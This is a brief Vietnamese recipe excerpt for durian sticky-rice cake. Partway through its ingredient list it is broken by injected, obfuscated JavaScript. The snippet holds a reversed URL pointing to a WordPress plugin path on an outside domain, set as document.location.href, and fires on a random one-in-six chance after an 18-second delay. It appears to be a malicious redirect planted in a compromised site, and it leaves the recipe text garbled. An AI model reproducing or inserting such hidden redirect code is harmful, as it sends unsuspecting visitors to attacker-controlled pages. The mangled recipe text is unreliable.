Cách làm bánh nếp sầu riêng

Chỉ cần vài nguyên liệu đơn giản bạn đã có thể làm bánh nếp sầu riêngthơm ngon đãi cả nhà rồi! Để làm món bánh nếp sầu riêng bạn cần chuẩn bị những nguyên liệu sau: – 1 múi sầu riêng toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to – 150g bột nếp – 40g bột… Continue reading Cách làm bánh nếp sầu riêng